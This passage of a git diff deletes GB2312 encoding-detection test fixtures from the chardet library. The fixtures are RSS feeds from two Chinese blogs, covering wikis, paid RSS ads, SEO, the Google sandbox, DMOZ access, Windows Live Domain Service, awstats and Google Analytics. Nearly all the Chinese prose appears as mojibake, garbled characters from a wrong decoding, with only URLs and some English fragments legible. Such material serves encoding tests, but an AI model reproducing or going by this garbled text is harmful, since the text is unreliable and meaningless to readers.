    ¹«¹²ײ×¶·ײ׳׃ֳַ£¬ַכ²»ׂ×װ±ױֳֵװל³µֱֻ£¡ׂ»ֶנµ½װ׃²´װֹתׂ°³צֳ»µִJungleְןְ´°ֹ£¡

    ]]>
    -
    - - ±¾־ִװ­·¢׃÷£±µִ±´¿ַ¡£Wiki¾¿¾¹²ֳ´±÷ע׳מָֿׂ‎ָכµִײ׀־ִָ¦׳׃ - http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html#109327611860082281 - ±¾־ִװ­·¢׃÷£±µִ±´¿ַ¡£

    Wiki¾¿¾¹²ֳ´±÷ע׳מָֿׂ‎ָכµִײ׀־ִָ¦׳׃£¬ױגַׂ»¸צ´ף¼ׂ´׃־´ּ½ּײ¹‎µִ»°ּג¡£־ׂײ»ִ¾ֽ־ֻׂשֱֻ½גµ½µִ£¬ֻµׂ»ֻµ¹תִ±ָ½ֿװחµִ¼¸¸צWiki¡£

    ־ֻׂשֱֻ½גµ½µִ׳מװחµִWikiַ׃ֹֻקֳ״ָם¼‏¹₪׳קׂ£¨Softme Studio£©·¢ֶנWebPMֿמִ¿µִׂ»¸צ׳׃ֿמִ¿jWiki¡£WebPMֿמִ¿£¨Project Management On Web£©µִײקׂ×ִ¿±ךַ־×ײ׀־ִ׳װ׃ָֹם¼‏µִ¿×·¢ױ¡¢¹׃ֳױ÷ֶֽֽ¹דױּב¹©»ש׃»¥ֱ×ֽרµִ¿×·ֵ½¹ְםֶ½ּ¨»·¾³¡£ֶהײ׀jWiki׳׃ֿמִ¿µׂ»½׳¶־¿×¼׃2001ִך12װֲ27ָױ£¬½בר׃2002ִך01װֲ14ָױ¡£¾ֻµ¡°½¬÷‎¡±׀ײ¶װױג¸צ½׳¶־µִ¹±ֿ׳׳מ´ף¡£µׂ»½׳¶־½בר÷ף²»¾ֳ£¬ֳַֻ¾ֽ¿×ֹטֱֻׂ»¸צ²גװµִױ¾µד softme.org (ִ¿ַ°ױג¸צױ¾µד²»ֽ¨)£¬ְ´²גװֳַֻµִWikiֿµֽ³¡£־ׂװר¾­װִַ¸צֿµֽ³ֹֿ׳¢²ב¹‎¡£WebPMֿמִ¿µִ¿×·¢ֵֽ¶׃÷ֳֿס»¹ַ¹תִ±ָ½ֿװחµ¼שXPµִ¶׃־י¡£jWikiֿמִ¿ײֱ½ס»¹װ»מװ¾£¬½סִך7װֲ6ָױjWiki-v2.0.1-rc1 °ז±¾·¢²¼ ¡£

    ־ׂ÷ֿכִ÷ֽױג׀©ָֿ׀׀ױ½»ֱקׂ»ֲֿ£¬ּ‎ּ‎ֳַַָֻח÷־ָֿ¶Wikiµִ¡£

    ־ֱֻׂ½גµ½µֲִֿׂ»¸צWikiַײ׀ע‏´ףװ׃װ÷£¬ֻ¿ִַֹװ2002ִך5װֲ·¿×ֽ¨µִ¡£ײ׀ע‏´ףװ׃װ÷±ָ½ֿ׃׀ׂגֻ¼£¬ֳַֻװµ¼ש׃ֳײ׀־ִ׀´³ּ׀ע¡£

    װֲֿׂ»¸צַײ׀־ִ־¬»ש°¿ֶ,±¼הװ2002ִך10װֲµ׳¡£ִ¿ַ°ױג¸צWiki·ַ³£ִָָײ£¬׃¦¸ֳַײ׀־ִָ¦׳׃ְן׳מ´ףµִWikiױ¾µדֱֻ¡£ָ»÷ףֳַ³´ףWiki£¬´ף¸ֵַ2002ִך11װֲ³ץ¿×ֽ¨µִ¡£

    ¾ּוµִ±¼ה¿ִֹ»ב׃׀ׂ»׀©׀¡µִ³צָכ£¬µ«´ףּו׃¦¸ֳ²מ²»¶א¡£׃׀ֱֻ½ג¸¶אַי¿צµֲִנ£¿´ף¼ּׂײֲׂ»ֲֿ¡£
    ]]>
    -
    - - ±¾־ִװ­·¢׃÷£±µִ±´¿ַ¡£־ׂ´׃Googleֹֻֿׁ¼¯ֱֻׂ»׀©ּ¨ֽוµִWi - http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html#109327135151894093 - ±¾־ִװ­·¢׃÷£±µִ±´¿ַ¡£

    ־ׂ´׃Googleֹֻֿׁ¼¯ֱֻׂ»׀©ּ¨ֽוµִWiki׳ֱֿ£¬·¢ֿײּ¨ֽוװWiki·½ֳזµִ׃¦׃ֳ·ַ³£¶א£¬׳«׀´µִ½יֹWikiµִ־ִױֲ·ַ³£׃׀¼ײµ¡£ֳַֻµִ׀ם¶א¹₪׳ק¶¼÷ָֿױז׳׀ֿ¸£¬ׁ¹גׂ²¿ם¹ד£¬ִָ·ַ³£ֹמָכ¡£ֿא±ָ¶רׁװ£¬´ףֲ½ױג±¶װWikiְם½גּו»בׂ×±ֲֳַָֻה÷ף׀ם¶א£¬־ׂ¾ץµֳװ¿´¹‎µִױג׀©־ִױְֲן£¬ײ»׃׀ָ‎ֱ×ֹת»מײ¿¯µִֹ׀½ר·­ׂכµִִֶַס¶¶װ»°׳¨·ֳ£÷ּ‎Ward Cunninghamֿ¸צWikiײ®ַ°ְ½סֹת¡·¿ֹׂװ÷ֳַֻֽµִ¹₪׳קזְֳַ¡£־ֳַׂׂ×ָֿױזֿעֳַֻׁ§ֿ°¡£־ׂ¶װ¶װ°¶µֱִֻ½ג׃׀ֿ£¬»ע׀ם»¹׃׀÷ֳ¶א±¦²״ֳ»׃׀·¢ֿײ¡£־ֱֻׂ½גµ½µִ÷ֳµִ׳ֱֿ´ף¸ֵ׃׀ֲֳֿז¼¸¸צְ´װ´£÷Schee (׀ל׳׃÷­)¡¢hlb (ׁ¦ֱ¼±ף)÷ֽ Newzilla £¬ֲֳֿז¾ּוֻµֳק¡£

    Schee (׀ל׳׃÷­)¡¢hlb (ׁ¦ֱ¼±ף)ַװּ¨ֽו±ָ½ֿװחֶֽ¶¯Wikiµִָֻ£¬ֳַֻµִBlogְן¶¼׃׀Wikiµִ׳¨ְ¸£÷׀ל׳׃÷­µִװױגְן£¬ׁ¦ֱ¼±ףµִװױגְן£¬ױג׀©׳¨ְ¸ְן´ף¶אַׂ»׀©ֱדֱדֹ¢ֹ¢µִ¶ּ־ִ£¬ױגְןֳזׁ¦ֱ¼±ףµִ¡¶Wiki ¼ע½י¡·¿ֹׂװ²־¿¼¡£װ¡¶Wiki ¼ע½י¡·ׂ»־ִµִִ©־²»¹¸ר³צֱֻׂ»¸צ׃׀ׂגֻ¼µֱִ´½׃£¬¾ּוװֲֿׂ»¶־ײ׀ֻµ¡£

    ׁ¦ֱ¼±ף׳װ¼÷׃׀ׂ»¸צWiki£¬ױגְןֳזׂ²׃׀ׂ»׀©¹״׃Wikiµִּץִ¿£¬׳װָ»Wikiּץִ¿±¾ֹםַ¸צ²יױׂWiki׀ֵֿ¢µִָכ¿¡£¡¶Wiki ¼ע½י¡·ׂ»־ִ¸ר³צµִ¼¸¸צֱ´½׃¾ֱֽ´µ½ױג¸צWiki£¬ֶהײ׀׃׀ׂ»¸צּץִ¿?TheWikiWayReview?±ָ½ֿ׃׀ׂגֻ¼£¬ֻ׃ֳµ½ c2 µִׂ»׀©ֱ´½׃׳י³ֱֹֻׂ»¸צּב¸£¬׃ְֳ´׳ק־×¶װ The Wiki Way ׂ»יµִ Review ¡£־ׂׂ²ָ¥ c2 ²י¹‎׳ֱֿ£¬µ«ְןֳזµִִָ÷¶א£¬ֻשׂװ¶װ c2 ְן¹״׃ Wiki ּץִ¿µִױּוָ±·¦ׂ»¸צ°ׁ־ױ£¬ױג¸צ Review ·ַ³£÷ֳ£¬ַ¡÷ֳ¿ֹׂװ¹־ֳַׂ°ׁ־ױױּו¡£»ע׀ם£¬ױגׂ²÷ֽ־ֳׂ»׃׀¶ֱ¹‎׃ֹWard Cunningham ÷ֽ Bo Leuf ÷ֿ׀´µִױג±¾ The Wiki Way ׃׀¹״¡£

    Newzilla ַּ¨ֽוֶֽ¶¯¿×װ´װֻ¶¯µִׂ»¸צֽרֲחװ׃ײ¾£¬·ַ׃¯ְ׀װµִ¡¢ײ¾װ¸ױ¹©¸ו£¬װֲ¿¯¡£ִ¿ַ°ׁׂ¾­³צֱָֻ‎ֶ£¬ױגָ‎ֳֶ¿ׂ»ֶ¶¼׃׀ׂ»ֶ×¹״׃Wikiµִ־ִױֲ£¬־ִױֲµִײֱ¿±ָ½ֿ¸¡£־ׂ¾ץµֳֽ·ֱ½ֶ¹״׃Wikiµִ־ִױֲ±ָ½ֿ׃׀¼ײµ£÷׀ל׳׃÷­µִ¡¶Wikiµְִת·÷ֽ¼¼ץּ״׀װ¡·÷ֽ²»ײ×ֳ׳קױµִ³₪־ִ¡¶Wiki µִװֻ׃ֳ¡·¡£ּ״±נַ¡¶Wiki µִװֻ׃ֳ¡·ׁ½ח÷¿ם£¬½²ֱֻ׀ם¶אWikiµִ׃¦׃ֳ°¸ְ‎¡£

    Newzilla ׳װ¼÷׃׀ׂ»¸צ Wiki£¬ַ´׃ׁ¦ֱ¼±ףµִ Wiki ּֽׁ¥¶רְ´µִ¡£ױג¸צWikiְן¹״׃Wiki±¾ֹםµִּץִ¿ׂ²ַׂ׿´¿´µִ£¬»¹׃׀ׂ»¸צWikiInTaiwanׂ²ׂ×ֱפׂג¡£

    ³‎´ֻײ®ֽג£¬»¹׃׀¼¸¸צµ״·½¿ֹׂװָ¥¿´¿´£÷

    ¾ָֽֿ׀´ױגֳ´¶א°ֹ¡£
    ]]>
    -
    - - udn¡¶‎־»־ִ»¯ײ¾¡·ַּ¨ֽוֱ×÷ֿ׀ֲ־ֵֽר׃½סִךֶװֲׂ»ָױֶֽ³צµִׂ»¸צ - http://www.cnblog.org/blog/archives/2004_08_15_cnblog_archive.html#109279729369254882 - udn¡¶‎־»־ִ»¯ײ¾¡·ַּ¨ֽוֱ×÷ֿ׀ֲ־ֵֽר׃½סִךֶװֲׂ»ָױֶֽ³צµִׂ»¸צׂװ׳¨ְ¸־ִױֲ־×ײקּוײ®ֽרױ¾ֳ½ּו£¬װ³ן»®³ץֲֶׁׂ½׀רׁװ¼׀ם¶אװ‎־»ִָ¼°ֽרֲח־ִ»¯¸קֱל׃ע׃׀ֻש׳¨¾«µֳִ¼ׂ·¢±ם־ִױֲ£¬ֽ¬±ׂ²¿×·ֵֽ¶¸ו¼°ֹֿֿֿל׃¦ּײֲ¡£

    ¡¶‎־»־ִ»¯ײ¾¡·µִִָ°ֲֽעֿף£¬ײקׂ×µִ·ײְא־×‎־»ִָ¡¢ֽרֲח־ִ»¯¡¢׀ֵֿ¢ֹח»ב÷ֶֽֽ¼צ׳¨ּג£¬ָ»÷ף׃ײ·ײֱֻ׀ם¶אֿ¸ֿמ£¬ײמָחֱק׀׀¡¢־ִ»¯¡¢׀ֵֿ¢¡¢׀³¡·ײ־צµֳָזֿעµִײקּג¡£ֶהײ׀£¬ׂ²°ְ¨ֱֻ½ְ´ֿאµ±ֳֵָָµִblog¹¥ֲװ¡¢ֹֿֿ׃־ֿ·¡¢ֽרֲח־ִׁ§÷ֽײ»ת׃¦׃ֳµָ·¶³כ£¬װ´ֶֻֽ¼צ¸רcnblogµִ¶ֱױֵף׃ֳַׁ¡£

    ´ֻֽג£¬udn¡¶‎־»־ִ»¯ײ¾¡·ׂ²ֶֽ³צµח׳׃±¨÷ֽRSS News Feedµִ¶©װִ¹¦ִ£¬׃׀׀ָֻ₪µִֵף׃ׁ²»·ֱ¶©װִׂ»·£¬¿´¿´ְ´׳װּ¨ֽוµִ‎־»־ִ»¯¹µד¡£

    ֿכײ±½׃¶©װִ¡¶‎־»־ִ»¯ײ¾¡·ֲנ£¿ֶµµְֽרײ·־×£÷http://mag.udn.com/mag/dc/make_rss.jsp¡£
    ]]>
    -
    - - Gr - http://www.cnblog.org/blog/archives/2004_08_15_cnblog_archive.html#109272976223471953 - Gr]]> - - - eWeekµִֿֿ¢£÷ Preps Paid RSS Links - http://www.cnblog.org/blog/archives/2004_08_15_cnblog_archive.html#109263639395084299 - Preps Paid RSS Links as Ads Expand¡£

    ¹ ׃ֳ¹‎Feedsterµִ׃ֳ»§¶¼ײ×µְ£¬ִֻ¹‎־×ֳ¿¸צֻֻׁקµִ¹״¼´ֹת³ֹׂ»¸צRSS־ִµµ¡£ׂ²¾ַֻֽµ£¬׃ֳ»§ִ¹»¶©װִֻ׳װ¶¯׳·׳Blogְ½חְןִ³¸צ·½ֳזµִ׳מ׀ֲִָ¡£ װFeedsterµִ׀ֲµִֹּׂµִ£½ײ׀£¬½«»ב°ׁ÷ֽ¹״¼´ֿא¹״µִ¹ד¸זִָ²וָכµ½RSSְן¡£¾ֻµֳַ¿ֱשּץRSS־ִױ×·ֵײֳׂ»ּץ¹ד¸ז¡£

    µ±ָ»£¬Feedsterׂ²ּב¹©־²וָכ¹ד¸זµִRSS¶©װִ·‏־ס£¬²»¹‎ױגַׂ×ױ·ׁµִ£¬ֳ¿ִך10ְֳװ×£¬ֶהײ׀׃׀ׂ»ְֳװ×½«±»¾טײת¸ר¼¼ץ·ַ׃×ְ׀װ׳יײ¯]]>
    -
    - - diff --git a/chardet/tests/GB2312/coverer.com.xml b/chardet/tests/GB2312/coverer.com.xml deleted file mode 100644 index 0cf137d..0000000 --- a/chardet/tests/GB2312/coverer.com.xml +++ /dev/null @@ -1,95 +0,0 @@ - - - - - - coverer.com weblog - http://www.coverer.com/ -
    -²ֳ´ַSEO£¿SEO¾ַֽSearch Engine Optimizationµִֻץ׀´¡£To use some technics to make your website in the top places in Search Engine when somebody is using Search Engine to find something. - -¹׃ֳׂ»׀©·½½װֻׁׁ°ׂ‎ַזײ׀µִ׳מ¸µ״·½ײ׀ײֶװלִדµִֽרױ¾µ±ִ³ָֻױ‎װ¹׃ֳֻׁׁ°ׂ‎ַזױִׂ³־ןµִ±÷ע. ]]>
    - en-us - - Sat, 17 Dec 2005 12:59:39 +0000 - - ֽרױ¾ֲֳֵֵֿ½µµִײקׂ×װ­ׂע: - http://www.coverer.com/archives/000839.shtml - µ±ֻֻׁקׂ‎ַזµִֻד·¨¸ִ±ה»עױ¼׃ַ¿±,µ¼ײֲׂ»׀©ֽרױ¾µִִ³׀©¹״¼׳ײֳֵֵֿ§,ׂ»׀©¹ְםװ±¾ֻֽµֳַֻµִֽרױ¾ֿ§ֱֻ.µ¼ֹֿ²¢·ַָח´ֻ,װֻֻׁקׂ‎ַזֻד·¨¸ִ±ה»ע¼׃ַ¿±»בׂ‎ֶנׂ»׀©ׂ³ֳז¶×§,»עױַ¹‎ֲֻ¡¢³ֽ·£ֱִֻ³ׂ»׀©ׂ³ֳז¶ר²»ַױ¸צֽרױ¾¡£... - - - Google Sandbox ׀§׃¦ - http://www.coverer.com/archives/000838.shtml - 1. ÷־־½sandbox׀§׃¦£¿ Sandbox½צַ·¢ֹתװgoogleֳֵֵײ׀µִׂ»ײײֿײֿף¡£ׂ»°דָֿ־×£¬sandbox׀§׃¦ַ·¢ֹתװ¾א½ס׳מ½µִGoogleֻד·¨¸׀ֲ÷ף£¨¼´ׂµ½ח³ֶ־ס°Florida¡± ׃כ ¡°Austin¡± ¸׀ֲ£©¡£¾ּוַױגׁשµִ£¬google»ב¸ר׀ֲֽרױ¾¶מֽג¼׃ֹֿׂ»¶¨µִ·ײײµ£¬¹µֳ׀ֲֽרױ¾µֳִֵֵׁ¸ֹֹֻֿ‎£¨ִ³¼¸ײײִ¿±ך¹״¼׳ײ£©¡£ֻז÷ףµִׂ»¶־±¼הְן£¨´ף¸ֵַׂ»µ½ָ‎¡¢ִֻ¸צװֲ£©£¬ֽרױ¾µֳִֵֵ¾ֽ»בײנ½¥ֲֿ½µ£¬׃׀µִײקׂ×¹״¼׳ײֳֵֵֹץײֱ»בֿ§£¬£¨¾¡¹ִדµִPR÷¸£¬ׂ³ֳזִָ׃כװ­ְ´ׂ»ׁש£©¡£ױג¾ָֽחֹ³ִ®ְןµִֹ³ֱק½«ײ־§µִ־ןּוֲ‎ֲ‎ּֽ £¬ֻשׂװׂµ½ח¸רױגײײֿײֿףָ¡ֳ־× sandboxֿײֿף¡£... - - - ¹׃ֳGoogle׃ןׁװ¹₪¾·ֳ־±»ֱֶ±־µִDMOZ - http://www.coverer.com/archives/000837.shtml - ½סּל·¢ֿײde.dmoz.org÷ֽch.dmoz.org¶¼²»¿ֹׂװ·ֳ־ֱֻ£¡£¡¹׃ֳ´תְם׃ײֲי·³ֽ¬±·ֳ־ֶהֻױ¾µדׂ²÷ֲ‎£¬׃ַֿכ³צ¹׃ֳGoogle׃ןׁװ¹₪¾ְןµִ·­ׂכֽרׂ³µִ¹¦ִ·ֳ־±»ֱֶ±־µִDMOZ.org£¬׀§¹»¹²»´ם ¾ּו²½ײטָחֲֿ£÷ 1£÷´ע¿×google ׃ןׁװ¹₪¾£÷http://www.google.com/language_tools?hl=zh-CN 2£÷¹׃ֳ¡° ·­ׂכֽרׂ³¡±¹¦ִ£¬הָכ£÷http://www.dmoz.org ֲֳֿזׁ¡װס¡°ײ׀־ִ(¼עּו)·­ׂכ³ֹ׃¢׃ן¡±°´·­ׂכ°´ֵ¥£¬ַ²»ַ׃ײ¿ֹׂװ·ֳ־DMOZֱֻ£¬¶רַֻׂ¶ָׂ²÷¿ל£¡ֶהµ¾ַֽ¹׃ֳGOOGLEµִ·­ׂכ·‏־סֶק·ֳ־DMOZ ײ±½׃·ֳ־DMOZ.org... - - - Windows Live Domain Serviceֿךֿ¸²׳קֻµֳקי - http://www.coverer.com/archives/000836.shtml - "¸תµ±ִךGmailֶֽ³צ±µֱִָ¿·ֹװ¾ֿא±ָ£¬ױג´־Windows Live°ֳׁג·ׁ׃¼‏·‏־סְ©ױ¹³ֳֹג·ׁ׃¾ײ·‏־ס£¬׃׀¹‎ײ®¶ר־²»¼°¡£׃¼‏·‏־סµִ¾÷ױשׁׂ¾­´׃ֱָ¿¡¢½חֳז¼°ׂ׳׃ֳ׀װ£¬½רָכµ½·‏־ס¼¶±נµִµָ‎½׳¶־ֱֻ¡£ " Windows Live Domain Serviceµִ·‏־סִָ°ְ¨£÷ - ־×ֳ¿¸צ׃עֳ´´½¨ײֱ¶א20¸צ׃ֿה£» - ֳ¿¸צ׃ֿה¸תHotmailׂ»ׁש׃µ׃׀250M¿ױ¼ה£» - ¹׃ֳָ־÷־ֹֽֿרµִµחִװ²י¿´׃¼‏£» - "Microsoft SmartScreen Technology"ְ¬»ר׃¼‏¹‎ֲֻֿµֽ³£» - Email²¡¶¾ֹ¨ֳט¹¦ִ£» - ÷ֽMSN Messenger¡¢MSN Spacesµֶָהֻ·‏־ס־·לֱ¬½׃¡£ ֲֳֿזֿךֿ¸½²½גׂ»ֲָֿח÷־ֹךַכ÷ֽ²׳קױג¸צWindows Live Domain Service µׂ»²½£÷´ע¿×ױג¸צµ״ײ·http://domains.live.com/ ½ר׀׀ֹךַכ·‏־ס¡£ "Click here to setup e-mail for an existing domain today! "ִד»בװׂ³ֳזױׂµ½ױגׁשׂ»¾ה»°£¬µד»קhereµֱִ´½׃¼´https://domains.live.com/Signup/¡£... - - - ־¢ָםHotmailּב¹©µֳִג·ֶׁףׂµ׃¼‏·‏־סֱֻ£¬¿ֹׂװ¹׃ֳ׳װ¼÷׃עֳ־×÷ף׳÷ - http://www.coverer.com/archives/000835.shtml - ־¢ָםµִlive.comֶֽ³צֱֻׂ»¸צdomains.live.comµִ·‏־ס. ׃ֳ»§ײ»ׂ×װױגְן½«ִד׳װ¼÷µִ׃עֳDNS¶¨־»µ½־¢ָםµִ·‏־סֶקֹֿ£¬¾ֽ¿ֹׂװֿם׃ֳ ׃ֹ־¢ָםHotmailּב¹©µֳִג·ׁ׃¼‏·‏־סֱֻ¡£µ±ָ»£¬ױג´־ַ׃ֳִד׳װ¼÷׃עֳ־×÷ף׳÷ µִ׃¼‏µ״ײ·. ֿײװ²גװ½׳¶־ײ»׃׀ְֳ¹ת¹תִ׃ֳ»§¿ֹׂװֿם׃ֳ250Mµֳִג·ׁ·‏־ס,¹תֽג׃ֳ»§¾ֽײ»ִ ½«¾ֽׂ»ֲֿ׃ֳ25Mµֱִֻ.װֹטײֳֽך׃עֳ¹ְםװ±ױ÷ֵ÷ֳ,¸ֳױ¾µד»בּב¾ִדָ¥׃עֳ׳¢²ב ְִַֹּן׀¸ִMX(Mail exchange) Serverµִµ״ײ·.׀¸ִ־×׀־ָח2032718785.pamx1. hotmail.comµֳ·‏־סֶקֳ÷ף,µָµָ¾ֽ¿ֹׂװ¹׃ֳ׀ֲ·‏־סֱֻ. ִד»¹¿ֹׂװֽ¬±׃µ׃׀ֿא׃¦µֳMSN Messenger·‏־ס÷ֽSpace·‏־ס.ַ²»ַ÷׃׀ָ₪? ֿא׀ֵ»ב׃׀¸¶אµִ·‏־ס»בֲ½׀ר׳×ְֶׂ´ױגְן. ײױ׃ֲײµ½־¢ָםׂ²´´ׂגֱ¬ֳאׂ»»ב.²»¹‎ױג¸צײ׀¹תָֻׂ²װחֽז¹‎ֱֻ.װחַ°µִֵׁ»¢ײ׀¹ת ֶֽ³צ¹‎׃¼‏ֱ×ֳֻ,¾ְַֽאֶֻµֳֳג·ׁ׃¼‏ֶֽ¹דׂµ־ס.... - - - Google Base ׁׂ¾­¿ֹׂװ·ֳ־¹׃ֱֳֻ - http://www.coverer.com/archives/000834.shtml - Googleµִ·ײְא¹ד¸זGoogle Base ׁׂ¾­¿ֹׂװ·ֳ־¹׃ֱֳֻ Google½«ױגֿמ·‏־ס׃־ס°¿ֹ¹©׃ֳ»§ּם¼׃¸קײײְא׀ִָֽµִ‎¾¿ג¡±¡£Googleװֽרױ¾ֹֿµִֹשֳקײ׀³ֶ£÷¡°Google Base½«½׃ױ׃ֳ»§ּב½»µִֻש׃׀ִָ£¬²¢½«ױג׀©ִָ¼׃ָכֽרֲחֻֻׁקׂ‎ַזֻקׂ‎£¬¹©ֶהֻ׃ֳ»§ֳג·ֻֻׁׁק¡£¡± Google Baseֽרױ¾¸ר³צֱֻ׃ֳ»§¿ֹּב½»ִָµִׂ»׀©ְ‎׳׃£¬ֶהײ׀°ְ¨¶‏ײ³µ¡¢¾»ב¹ז»®·‏־סֳטצׂװ¼°ׂ»¸צµ°°׳ײ½ב¹¹‎¾¿ג¡£ ־ׂ·¢²¼µִ׀ֵֿ¢£÷ http://base.google.com/base/search?q=neckties http://base.google.com/base/search?q=battery... - - - ¹ת¼׃עֳֹ¾³‎µִ¹זֲֹ÷ֽ׃עֳ׳´ּ¬½גֽ - http://www.coverer.com/archives/000833.shtml - 1¡¢±ָָח׃עֳmsnask.comµ½ֶ±¼ה־×2004ִך11װֲ1ָױ£» 2¡¢´׃2004ִך11װֲ2ָױ¿×¼£¬׃עֳµִdns½«»ב±»ֿµֽ³׳װ¶¯ֹ¾³‎£¬׃עֳ־·¨½ג־צ£» 3¡¢ָח¹װ30ּלֳִֶֿ»׃׀׀ר·ׁ£¬¼´´׃2004ִך12װֲ1ָױ¿×¼£¬׃עֳ½«±ה³ֹRedemptionPeriod׳´ּ¬£¬¸ֳ׳´ּ¬½«»ב±£³ײ30ּל£¬װ´ֶֻ¼ה¸ֳ׃עֳ²»»בµפְֲֿ´£¬µ«ַ³‎ֱֻrestoreֱֳמׂװֽגµִֻש׃׀ֱֳמ¶װ´ֻ׃עֳ־׀§£»... - - - Google¹·½ּב¹©µִ¹״׃Google׃ֵ»¯µִ׀ֵֿ¢ - http://www.coverer.com/archives/000832.shtml - ֽרױ¾¹ְםװ±ײ¸ִֿ ׳סׁ­ׂװֲֿײ¸ִֿ½«׃׀ײת׃ Google ²יױׂ¡¢¼לֻקִתµִֽרױ¾²¢¶װֶה½ר׀׀ֳֵֵ£¬ױגַָ·±£װ Google ֻֻׁק½ב¹ײ׀ֱ׀³צִתµִֽרײ·µִ׳מ¼ֽׁ¾¾¶¡£¼´¹ִתׁ¡װס²»²ִֹֹױג׀©½¨ׂי£¬־ֳַׂׂ²ַ¿ֱׂ½¨ׂיִתֳַ׀¹״׳¢"ײֱ¿ײ¸ִֿ"£¬¸ֳײ¸ִֿ¶װ¿ֹµ¼ײֲֽרױ¾´׃ Google ֻקׂ‎ײ׀³¹µ׳ֹ¾³‎µִׂ»׀©־¥½׀׀־×׳צֱֻ¼עׂ×ֻµֳק¡£ׂ»µ©ֽרױ¾ֹ¾³‎ײ®÷ף£¬Google.com »ע Google ֻש׃׀÷ֿ׳ק»ן°יֽרױ¾µִֻֻׁק½ב¹ײ׀¶¼²»»בװֿװ¾¸ֳֽרױ¾¡£ ......... - - - ָױײ¾·ײ־צָם¼‏awstatsµִ°²׳°¹׃ֳ¼עׂ׳ײ¸ִֿ - http://www.coverer.com/archives/000831.shtml - 1. ֲֿװ״µ״ײ· http://sourceforge.net/projects/awstats/ http://voxel.dl.sourceforge.net/ ... ts-6.4-1.noarch.rpm 2. °²׳° 2.1 rpm°²׳° [root@web tools]# rpm -ivh awstats-6.4-1.noarch.rpm Preparing... ########################################### [100%] 1:awstats ########################################### [100%] ----- AWStats 6.4 - Laurent Destailleur ----- AWStats files have been installed in /usr/local/awstats If first install, follow instructions... - - - Googleֶֽ³צ¹ד¸ז·ײ־צ·‏־ס ֳג·ּׁב¹©ָ«·½־»±¨¸ז - http://www.coverer.com/archives/000830.shtml - ±¾ײׂ»Google½«ֶֽ³צׂ»¿מֳג·ֽׁרֲח·ײ־צ·‏־ס£¬¼´װ׀ם¹«ֻ¾ֶףׂµ¾«ָ·ֱֻ½גֶהֽרױ¾µִ·ֳ־׃ֳ»§»¥¶¯ַי¿צ£¬ׂװ¼°ֶה¹ד¸ז»מ¶¯װֻ׀׀׳´¿צ¡£ ¡¡¡¡ױג¿מ±»³ֶ־×Google Analyticsµֳִג·ֽׁ׀¹·‏־ס½«׳ֶָֽֿ³צ׃¢־ִ°ז¼°ֶהֻ16ײײ׃ןׁװ°ז±¾£¬ַGoogle»ש׃ֶה3װֲ·ױ¹÷µִ¥µ״ַׁ¸חUrchin¹«ֻ¾µִ¼¼ץ¿×·¢¶ר³ֹ¡£ ¡¡¡¡´ַֻ°Urchinׂװֳ¿¿מ495ְֳװ×ֳ¿װֲµִ¼¸סֿת¸ֳ²תֶ·£¬ײ®÷ףװר±»Google½µײֱ199ְֳװ×ֳ¿װֲ¡£ױג¿מֽרֲח·ײ־צ³ּ׀עµִָ«²¿¹¦ִ¾ש»ש׃Urchinµִ¼¼ץ£¬²¢½«´תּזִ¿ַ°Google AdWordsֻשּב¹©µִ¼עµ¥µִ¸ת׳¹₪¾¡£ ¡¡¡¡Google Analyticsװ׀םֽרױ¾ײק׳¼ָ·²י¿´ֶהֽרױ¾·ֳ־׃ֳ»§µְִ´װ´£¬ױ¾ֱִקֱ¿׳מ¶אµֱִ´½׃£¬׃ֳ»§ױ‎װה¯ְְµִֽרׂ³£¬׃ֳ»§ֽ£ֱפֽרױ¾µִ±¼ה£¬¹÷־ןֽרױ¾ֹֿ±»¹÷ֲעµִ²תֶ·ׂװ¼°ֳַָֻװִִׂ»¸צײ§¸¶»·½·ֵֶת¹÷־ןµָµָ£¬Google¹«ֻ¾¹₪³ּײק¹¼זUrchin´´¼ָֻײ®ׂ»µִPaul Muret½יֹµְ¡£ ¡¡¡¡Google Analytics½«׃כGoogle AdWords¹ד¸ז³ּ׀עֿא½ב÷ֿ£¬װֿײ׃׀µִAdWordsױ»§ִ¹׃ֳ׀ֲµִ½חֳז¡£׃×ֿתֹּ»¹¿ֹׂװְ׃ֳ¸ֳ³ּ׀ע¸ת׳ּץ·ש¹ד¸ז¡¢µח׳׃׃¼‏¡¢ֶהֻ¹ד¸זּב¹©ֹּµִ־´ײ§¸¶÷ֽׁׂײ§¸¶¹ד¸ז»מ¶¯µָµָ¡£ ¡¡¡¡Google Analytics»¹ִ׳װ¶¯µ¼ָכֽ¶׳»״±¨±¨¸ז‎¾£¬ׂע´ֻ¹ד¸ז¿ֽ»§¾ִֽ¶װֳַֻµִ¹ד¸זֽ¶ָכ÷ֽ²ת³צ½ר׀׀÷÷ֳµִ¶װ±ָ£¬Muret±ם¾¡£ ¡¡¡¡¾¡¹ְםֲֹֿGoogle Analyticsׂװ¼°ֽ¬ְא¾÷ױש׀װ·‏־סµִ¹׃ֳױװְ׃ֳױג׀©³ּ׀ע¼א¿״ֳַֻµִ¹ד¸ז»מ¶¯µִֽ¬±£¬ׂ²ִֿעGoogle·´ְ¡ׂ»׀©׃׀¹״ֽ¬ְא¾÷ױש¶װײ¹₪¾µִ¹₪׳קװ­ְםµִ‎¾£¬µ«Muret±ם¾£¬Google²»»ב´׃ײ׀»סµֳָ־÷־¾÷ױש׃ֵֶ¡£ ¡°־ֳַֿׁׂ¸ס¿״ײֶױגְא‎¾¡£ױג¿מ²תֶ·½צ׃ֳ׃ּב¹©ֿ·ׁױ±¨¸ז£¬²¢ֳָ׃ֳ»§ְ׃ֳױג׀©·ײ־צ±¨¸ז£¬¡±ֻֻµ¡£ ¡¡¡¡¡°ֻ÷׃׀ַ±ֱ¦³ֹ־×ׂ»¸צײ×ֳ¹«ֻ¾¡±µק²י¹«ֻ¾Jupiter Research׳ֹמ·ײ־צ¦Eric Peterson¾ֽׂװֹֿ׀ֲ־ֵ·¢±ם¿´·¨±±ם¾¡£¡°Googleװ½סִךִך³ץ¾ֽֽך³ֱֹֻױ¹÷£¬²¢ֵַׂ¬ֱ¦ׂװ¸÷ֳµִ·½½ְ׃ֳֶה׃ֵֶ¡£»ע׀םַ¼‏÷¼עµ¥µֲִַי¡£¡± ¡¡¡¡Google Analytics¿ִֹ¶װײמָחWeb Trends¡¢Web Side Story÷ֽClick Tracksµָ׳¨׳¢׃ײ׀׀¡׀ֽ׀³¡µִ¹«ֻ¾װל³ֹ־£÷¦£¬Peterson±ם¾¡£¡°ֻ½«´ע»קµ½ 